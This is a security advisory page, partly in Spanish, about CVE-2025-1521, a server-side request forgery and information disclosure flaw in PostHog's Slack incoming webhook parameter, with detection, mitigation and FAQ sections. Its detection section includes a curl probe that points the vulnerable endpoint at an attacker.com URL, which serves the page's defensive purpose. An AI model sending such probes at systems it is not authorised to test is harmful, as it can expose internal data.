Plataforma
other
Componente
posthog
Corregido en
8817.0.1
CVE-2025-1521 is an Information Disclosure vulnerability discovered in PostHog, a product analytics platform. This flaw allows remote attackers to potentially expose sensitive data due to insufficient validation of the slackincomingwebhook parameter. The vulnerability impacts versions prior to 6e8f035f9acd339c5ba87ba6ea40fc1ab3053d42, and a fix has been released.
The core of this vulnerability lies in PostHog's handling of the slackincomingwebhook parameter. Due to a lack of robust input validation, an attacker can craft a malicious URI that, when processed by PostHog, leads to the disclosure of sensitive information. Successful exploitation requires authentication. While the specific data exposed is not detailed, the potential for revealing internal configurations, API keys, or other sensitive data exists, depending on the resources accessible through the vulnerable parameter. This could lead to further compromise of the PostHog instance and potentially connected systems, enabling lateral movement within the environment.
This vulnerability was reported to ZDI (ZDI-CAN-25352) and subsequently disclosed publicly on 2025-04-23. The EPSS score is pending evaluation. There are currently no publicly available proof-of-concept exploits, but the relatively straightforward nature of the vulnerability suggests that one may emerge. Monitor security advisories and threat intelligence feeds for updates.
Organizations utilizing PostHog for product analytics, particularly those with integrations involving Slack or other external services, are at risk. Environments with less stringent input validation practices or those relying solely on default PostHog configurations are especially vulnerable.
• linux / server:
journalctl -u posthog | grep -i "slack_incoming_webhook"• generic web:
curl -I https://your-posthog-instance/slack_incoming_webhook?url=http://attacker.comInspect the response headers and body for any unexpected data or error messages.
disclosure
Estado del Exploit
EPSS
0.55% (68% percentil)
CISA SSVC
Vector CVSS
The primary mitigation for CVE-2025-1521 is to immediately upgrade PostHog to version 6e8f035f9acd339c5ba87ba6ea40fc1ab3053d42 or later. If an immediate upgrade is not feasible, consider implementing a temporary workaround by restricting access to the slackincomingwebhook endpoint and carefully validating any incoming URIs. Web application firewalls (WAFs) configured to inspect and filter URI parameters can also provide a layer of defense. After upgrading, confirm the vulnerability is resolved by attempting to trigger the vulnerable endpoint with a crafted URI and verifying that the request is properly rejected.
Actualice PostHog a la versión que incluye la corrección (commit 6e8f035f9acd339c5ba87ba6ea40fc1ab3053d42) o posterior. Esto solucionará la vulnerabilidad de Server-Side Request Forgery. Consulte las notas de la versión para obtener más detalles sobre la actualización.
Análisis de vulnerabilidades y alertas críticas directamente en tu correo.
CVE-2025-1521 is a vulnerability in PostHog that allows attackers to disclose sensitive information due to improper URI validation in the slackincomingwebhook parameter. It has a CVSS score of 7.1 (HIGH).
You are affected if you are running PostHog versions prior to 6e8f035f9acd339c5ba87ba6ea40fc1ab3053d42. Check your current version and upgrade immediately.
Upgrade PostHog to version 6e8f035f9acd339c5ba87ba6ea40fc1ab3053d42 or later. As a temporary workaround, restrict access to the slackincomingwebhook endpoint.
There are currently no confirmed reports of active exploitation, but the vulnerability is publicly known and a proof-of-concept may emerge.
Refer to the official PostHog security advisory for detailed information and updates: [https://posthog.com/security](https://posthog.com/security)
Sube tu archivo de dependencias y detecta esta y otras CVEs al instante.